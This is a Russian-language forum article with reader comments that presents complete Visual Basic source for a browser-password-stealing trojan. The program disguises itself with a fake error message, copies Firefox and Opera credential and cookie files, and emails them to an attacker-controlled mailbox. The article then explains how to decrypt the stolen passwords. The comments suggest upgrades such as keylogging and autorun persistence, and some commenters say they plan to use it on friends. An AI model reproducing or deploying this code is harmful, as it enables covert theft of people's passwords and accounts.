Программирование
Веб программирование

Пишем троянскую лошадку для браузеров (можно диписать для других программ)

 
 

Он может варовать пароли от :

Opera

Mozilla Firefox

В свойствах формы поставим ShowInTaskbar = false, и visible = false

Вот код:

Dim passmoz As String  'переменная
Dim passope As String  'переменная
Dim pass As String  'переменная
Dim emailz As String 'переменная
Dim passwordz As String 'переменная
Dim email As String 'переменная
Dim file As String 'переменная
Dim tema As String 'переменная
Dim text As String 'переменная
Dim app As String 'переменная
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
                (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
                ByVal bFailIfExists As Long) As Long
 
Private Declare Function MoveFile Lib "kernel32" Alias "MoveFileA" _
                (ByVal lpExistingFileName As String, ByVal lpNewFileName As String) As Long
Private Sub Form_Load()
On Error Resume Next ' мы любим предохранятся от настругивания ошибок если пойдёт что то не так =)
'воруем пароли от мозилы более менее сложное (т.к для каждого компьютера мозила генирирует индивидуальное название, правдо они зачем то сгенерированное название положили a файл profiles.ini) зачем???)
file = Environ("Windir") + "hacked.digius"  ' путь к папке C:windowshacked.digius с учётом того что диск может даже называтся D:windir\hacked.digius (учитывает папку windows которая работает на текущую систему)
If Dir(file) <> "" Then ' читает C:windowshacked.digius или может быть по другому не принцыпиально (в конце узнаем для чего) =)
MsgBox "Файл повреждён", 16, "Ошибка" 'программа должна же показать что она работает, а то юзер сразу поймёт что программа  попахивает подвохом
Unload Me 'выход из системы ' действие при наличии файла в данном случае выход из программы
Else
' действие при отсутствии файла
On Error Resume Next
Set fso = CreateObject("sсriрting.FileSystemObject") ' забьём
Set WshShell = Wsсriрt.CreateObject("Wsсriрt.Shell") ' забьём
MkDir (Environ("Windir") + "pass") 'создание папки по пути C:windowspass
MkDir (Environ("Windir") + "passmozilla") 'создание папки по пути C:windowspassmozilla
MkDir (Environ("Windir") + "passopera") 'создание папки по пути C:windowspassopera
' прячем  папку C:windowspass
strDIR = Environ("Windir") + "pass"
Set objFSO = CreateObject("sсriрting.FileSystemObject")
Set objDIR = objFSO.GetFolder(strDIR)
objDIR.Attributes = 2
strDIR = Environ("Windir") + "pass"
Set objFSO = CreateObject("sсriрting.FileSystemObject")
Set objDIR = objFSO.GetFolder(strDIR)
objDIR.Attributes = 2
email = "mymail@yandex.ru" 'кому отправляем
emailz = "podstava@yandex.ru" 'от кого (для этого регистрируем подставную почту, или используем уже имеющуюся)
passwordz = "password" 'пароль от подставной почты
tema = "Свежие пароли" ' это название письма которое придёт от подставной почты
text = "Свеженькие пароли от новой жертвы" ' текст письма которое придёт с подставной почты
app = Environ("AppData") ' переменная будет равна  пути до appdata
Me.Caption = "Привет Лошарик" 'не отображается на панели задач
Me.Caption = Environ("Appdata") & "MozillaFirefoxprofiles.ini" ' папка appdata + кусок пути: "MozillaFirefoxprofiles.ini" т.е на моем компьютере это выглядит так: C:UsersDIGIUSAppDataRoamingMozillaFirefoxprofiles.ini (win 7) , в win xp по другому: C:Documents and settingsDIGIUSApplication DataMozillaFirefoxprofiles.ini
Open Me.Caption For Append As 1 ' забиваем
Close ' забиваем
Open Me.Caption For Input As 1 ' забиваем
    Do While Not EOF(1) ' забиваем
        Line Input #1, a ' забиваем
        If Mid(a, 1, Len("Path=Profiles/")) = "Path=Profiles/" Then b = Mid(a, Len("Path=Profiles/") + 1, Len(a) - Len("Path=Profiles/")) ' забиваем
    Loop ' забиваем
Close ' забиваем
Me.Caption = "Привет Лошарик" 'название формы будет Привет лошарик
passmoz = app + "Mozillafirefoxprofiles" + b 'полный путь до папки с файлами мозилы в том числе с паролями =)
passope = app + "operaopera" 'полный путь до папки с файлами оперы в том числе с паролями
'всё теперь можем воравать историю, пароли, куки, и много чего ещё от мозилы
' копируем файлы с паролями в папку C:windowsp, и дальше по подпапкам оперы или мозилы (копирование сделанно для того чтобы если браузер работает то файлы не скопируются)
Call CopyFile(passmoz + "cookies.sqlite", Environ("Windir") + "passmozillacookies.sqlite", 0)
Call CopyFile(passmoz + "key3.db", Environ("Windir") + "passmozillakey3.db", 0)
Call CopyFile(passmoz + "signons.sqlite", Environ("Windir") + "passmozillasignons.sqlite", 0)
Call CopyFile(passope + "wand.dat", Environ("Windir") + "passoperawand.dat", 0)
Call CopyFile(passope + "cookies4.dat", Environ("Windir") + "passoperacookies4.dat", 0)
' настало время отправить данные с паролями нам на почту:
  Dim o_Mess As Object, v_Conf As String ' забиваем
Set o_Mess = CreateObject("CDO.Message") ' забиваем
v_Conf = "http://schemas.microsoft.com/cdo/configuration/" ' забиваем
With o_Mess ' забиваем
.To = email ' кому мы отправим будет = тому что мы написали в email
.From = emailz ' от кого мы отправим письмо будет = тому что мы написали в emailz
    .Subject = tema ' аналогично
   .TextBody = text 'аналогично
        ' файлы с паролями от мозиллы (может не сработать т.к мозя постоянно обновляется и файлы с паролями могут называтся по другому)
        'файлы которые наш троян присобачит к письму как вложения:
  .AddAttachment Environ("Windir") + "passmozillacookies.sqlite"
 .AddAttachment Environ("Windir") + "passmozillakey3.db"
   .AddAttachment Environ("Windir") + "passmozillasignons.sqlite"
         'Opera, настало твоё время =)
         ' тут ухишрений никаких не надо, тупое  указание пути к отправляемым файлам
    .AddAttachment Environ("Windir") + "passoperawand.dat"
   .AddAttachment Environ("Windir") + "passoperacookies4.dat"
  With .Configuration.Fields
     .Item(v_Conf & "sendusing") = 2
  .Item(v_Conf & "smtpserver") = "smtp.yandex.ru" ' это смтп сервер сюда пишем домен на котором зарегана подставная почта (для mail.ru это будет smtp.mail.ru)
   .Item(v_Conf & "smtpauthenticate") = 1
    .Item(v_Conf & "sendusername") = emailz
     .Item(v_Conf & "sendpassword") = passwordz
      .Item(v_Conf & "smtpserverport") = 25
    .Item(v_Conf & "smtpusessl") = False
  .Item(v_Conf & "smtpconnectiontimeout") = 60
    .Update
      End With
      .send
  End With
  ' убираем следы прибывания
 fso.DeleteFolder Environ("Windir") + "pass" 'удаляем папку C:windowspass
 Dim files As Integer
f = FreeFile
Open file For Output As f
Print #f, "Тебя взломал DIGIUS" 'создание файла на который будет опиратся программа при запуске,  программа 2 раза запускатся не будет и жертва не заложит вам всю почту письмами!
Close files
    MsgBox "Файл повреждён", 16, "Ошибка"
Unload Me 'выход  из программы
End If
End Sub

У вас остался вопрос что делать с этими файлами?, всё просто как день, создаем пользователь, запускаем там оперу и мозилу (если нет оперы или мозилы качаем устанавливаем и запускаем именно на созданном пользователе!), запустили?, закрываем и  качаем файлы которые пришли на почту и пихаем их по папкам которые откроем:

Для оперы в windows 7

открываем cmd или нажимаем  и вводим cmd и нажимаем ок! откроется окошко туда вводим:

start AppDataRoamingOperaOpera

Перед нами папка с файлами туда нужно скопировать скаченные с почты файлы: wand.dat , cookies4.dat ; соглашаясь на замену.

теперь делаем тоже самое только вместо: start AppDataRoamingOperaOpera вводми вот это: start start AppDataRoamingMozillaFirefoxProfiles далее в ходим в папку с вашим профилем она имеет название ********.default и туда кладем файлы: cookies.sqlite, key3.db, signons.sqlite; соглашаясь на замену

Как мы увидим пароли жертвы:

открываем мозилу дале:

Далее откроется окно настройки:

Теперь разберёмся с оперой:

Качаем программу Multi Password Recovery (MRP)

запускаем и видим пароли от оперы, т.е это пароли и логины с адресами сайтов твоей жертвы!

---------------------------------------------------------------------------------------------------------

Мог чтото накосячить писал статью в 3 ночи но код работает на 100%!

нажми на меня если хочеш скачать исходник


Есть вопросы? Спроси на нашем форуме!!
FireDay [22.04.2012 08:38]

Молодец, DIGIUS.
Такими темпами форум станет хакерским =)

алексей [22.04.2012 09:45]

а наф так писать код
Dim passmoz As String 'переменная
Dim passope As String 'переменная
Dim pass As String 'переменная
Dim emailz As String 'переменная
Dim passwordz As String 'переменная
Dim email As String 'переменная
Dim file As String 'переменная
Dim tema As String 'переменная
Dim text As String 'переменная
Dim app As String 'переменная


лучше же так

Dim passmoz As String, passope As String, pass As String, emailz As String, passwordz As String, email As String, file As String, tema As String, text As String, app As String

DIGIUS [22.04.2012 10:15]

Ох как я накосячил вчера столько ошибок, хотя бы код работает =).

DIGIUS [22.04.2012 10:16]

Лёха спасибо на будущее вооружусь)

алексей [22.04.2012 12:13]

да не за что. а идея не плохая с парольками этими
у меня планы на взлом друга (^_^)

DIGIUS [23.04.2012 12:28]

Да и ещё маленький нюанс вам надо молится чтобы жертва не использовала защиту на сохранённые пароли в противном случае вас при отображении паролей попросят ввести ключ!

алексей [23.04.2012 18:18]

спс дигус я о защите не знал и тока что поставил на всякий случай ;)

DIGIUS [24.04.2012 16:15]

Это спасёт только от моего троя

-Гепард97- [25.04.2012 11:47]

За идею зачет.
За реализацию - незачет:

1. Ты сбросил со счетов Осла (IE) - а ведь многие ламеры им пользуются!
2. Зачем использовать неудобные API для копирования? Юзай FSO, можно встроенным FileCopy, хоть чем. Если совсем напряг - Shell("copy") никто не отменял.
3. Но твой главный фейл - ты сохраняешь все это дело в папку винды. Капитан Очевидность напоминает, что без прав рута (тфу, админа) любая попытка записи в папку винды обломается и твой трой полетит на корм собакам. А вот C:\ProgramData никто не отменял - сохраняй-не хочу. Тонкий троллинг - сделать скрытую папку в хоум-дирке ламера)))
4. Реализован код, увы, через ж-пу. Я не вижу ни одной процедуры или функции - все напейсано прям так, что усложняет читаемость кода, я молчу о дебаггинге.
5. Прятать папку можно куда проще: Shell("attrib +h +s папка").

Итог: исправляй реализацию.

-Гепард97- [25.04.2012 11:49]

ЗЫ: ковырнул бы ты SQL'ники. Может, получится код, который позволит прям так читать пароли и куки.

Гость [08.05.2012 22:22]

Не проверял твой код, но на сколько я знаю там не всё так просто. По идее, вот эти куки и пароли что ты закачал, отображаться не будут, т.к. на каждом компе мозила и опера создают свой опеределенный код при установке, и если ты вставляешь другие кукисы, пароли и прочее, то он видит что коды не совпадают и отображает только логины, но не пароли. Я делал эту программу уже, никак не хотел пароли показывать по сказанной выше причине. Выход из этой ситуации только один, вся твоя прога только без отправки е-мэйла, по всем этим путям удаляешь эти файлы Kill() и добавляешь прослушку клавы GetAsyncKeyState(). Полюбому чел должен будет вписывать пароли и логины заново. + ещё в реестр и автозагрузку автозакидывание. Вот и всё.

Гость [08.05.2012 22:36]

Multi Pass Recovery не поможет. + ко всему, вы доиграетесь, что на сайт заглянут кто-нибудь из правоохранительных органов, и увидят что вы пописываете троянчики. Не выкладывайте сюда такое, если хотите поделиться, делайте это более правельным способом, по мэйлу или чату, или хрен знает как, но не выкладывайте на сайте.

DIGIUS [09.05.2012 01:08]

Точно совсем забыл =), статья выложена в ознакомительных целях, автор за собой ответственности не несёт.

DIGIUS [10.05.2012 16:46]

Уважаемы товарищ пессимист, код работает с текущей мозилой 12 версии!, с оперой не пробывал.

frager [11.05.2012 17:46]

на опере требует купить прогу(на которую ты указал ссылку)
работает с мозилой!

DIGIUS [12.05.2012 16:49]

А вбить в поиск: "MPR крякнутая русская версия" , что мешает? =_=

DIGIUS [17.05.2012 16:31]

Троян работает с мозиллой! и оперой! (для оперы я ошибся mpr не работает!!!, но есть аналог конкретно для оперы!: Opera Password Recovery? или если Opera Password Recovery не устраивает гуглите другие программы!)

Руслан [30.05.2012 08:18]

Кул всё работает

DIGIUS [31.05.2012 13:02]

Трудимся на славу бутырской тюрьмы...

Пися Камушкин [11.08.2012 22:09]

Мда спасибо автор благодоря твоему исходнику троя,я научился кодить на вб

DIGIUS [12.08.2012 05:18]

Да..., там полно грамматических ошибок =), неудивительно для трёх ночи сидел, скора может быть скину исходник кейлоггера (программа которая записывает то что вводит пользователь, а потом то что записала отправляет автору)...

С меня пыво [09.11.2012 04:06]

Бля DIGIUS,научи кодить на vb,плиз

EverybodyLies [09.11.2012 09:31]

всегда не любил подобные вещи в таком исполнении. Перепиши код, я исправлю статью.

Кулхацкер [09.11.2012 09:50]

Лайс модерируэ

EverybodyLies [09.11.2012 13:48]

ага, модерирую даже на парах, даже с телефона :)

DIGIUS [09.11.2012 15:55]

Если код ещё работает перепишу до нормального вида

Клизматрон [20.11.2012 19:12]

можете помоч с такой проблемой я создал трой кейлоггер BD2.Net-Logger и кинул его жертве а билд получился глюкнутый он шлет токо какие приложения у него запущенны и скриншоты а нажатие клавишь не записывает логи мне на фтп приходят повторно троя ему не как не закинуть можно ли както отследить какой комп мне на фтп инфу отправляет или еще как нибудь его все даки взломать?

kotZadrot [05.02.2014 19:58]

куда вставлять этот код я вообще полный нуб так что из всего ничего не понял

shyga [06.02.2014 20:47]

Никуда, так как код не рабочий.

DIGIUS470 [15.02.2014 02:22]

shyga, трояну скоро 1.5 года стукнет

Stertor370 [15.02.2014 11:52]

Где ты тут видишь трояна, Digius ?!

DIGIUS470 [16.02.2014 21:31]

Stertor, Троян (троянский конь) — вредоносная программа, проникающая на компьютер пользователя под безобидным внешним видом или в виде программы с каким-то осмысленным функционалом и приносящая вред. Это может быть передача создателю трояна приватной информации вроде номеров кредитных карт или возможность удаленно управлять зараженной машиной.

Данная программа занимается воровством файлов содержащих пароли с компьютера жертвы, тем самым подпадая под категорию трояна. Надеюсь доступно объяснил!

Stertor370 [17.02.2014 01:23]

Мне известно, что такое троян. Где ты ЗДЕСЬ видишь трояна? )

BondOs20 [09.03.2014 20:53]

Народ подскажите как зделать подобный вир токо для флехи ,
чтоб в комп жертвы вставил Флешку и нужная мне инфа на неё скопировалась!

Stertor370 [09.03.2014 21:01]

Тебе что, дома плохо? На нары захотелось, к фраерам?

BondOs20 [09.03.2014 21:07]

Нет ,хочю над другом прикольнутса
Но немогу заставить прогу с флешки запустится через Autorun

Stertor370 [09.03.2014 21:21]

Тогда другое дело. Но autorun работает только на XP, какая у друга операционка?


BondOs20 [09.03.2014 21:25]

Хр

Stertor370 [09.03.2014 21:35]

Ну поставь teamviewer. Вот отсюда можно скачать: teamviewer com

BondOs20 [09.03.2014 21:53]

Ща устанавливаю!

BondOs20 [09.03.2014 21:55]

Чёто я непойму причём тут переписка

BondOs20 [09.03.2014 21:58]

В первые сталкиваюсь с этой прогой

Stertor370 [09.03.2014 23:30]

Чёто я непойму причём тут переписка

при том, что нельзя не на тематическом сайте вот так в открытую обсуждать создание вредоносных программ. То, что тут есть статьи с таким содержанием означает не вседозволенность, а то, что их авторы - придурки. Их забанить нужно.

Edward300 [09.03.2014 23:56]

Ну как бы лучше в личке друг другу пишите.

BondOs20 [10.03.2014 00:00]

Спосибо учту на будущее

Flomaster [07.09.2014 08:29]

Автор плагиатил наверно всю ночь. Или ему слава программиста снится :) Товарищь, в следующий раз копируй хотя бы без палева...данному трояну больше 3х лет.

Flomaster [07.09.2014 08:44]

На сайте www.7ba.ru найди меня автор. Ник такой же. И смотри мои файлы:
"Троян",
"Сниффер",
"SMS фродер для модемов",
"Баннер для Windоws",
"Как написать фейк за 20 минут", "Взлом МТС и Мегафон: баланс",
"Взлом Wi-Fi /соседа, рабочий, любой/"

За каждое скачивание файла я 30 рублей получил

Flomaster [07.09.2014 08:48]

Идет набор в команду разработчиков ОN-LINЕ игр. Ищем сподвижников РС игры СТАЛКЕР-2. Для идей...webcardbank@bk.ru



Оставлять комментарии можно только зарегистрированным




Предупреждение: Вся информация представлена исключительно в образовательных целях.
Ни авторы, ни администрация не несут ответственности в случае ее использования в противозаконных целях.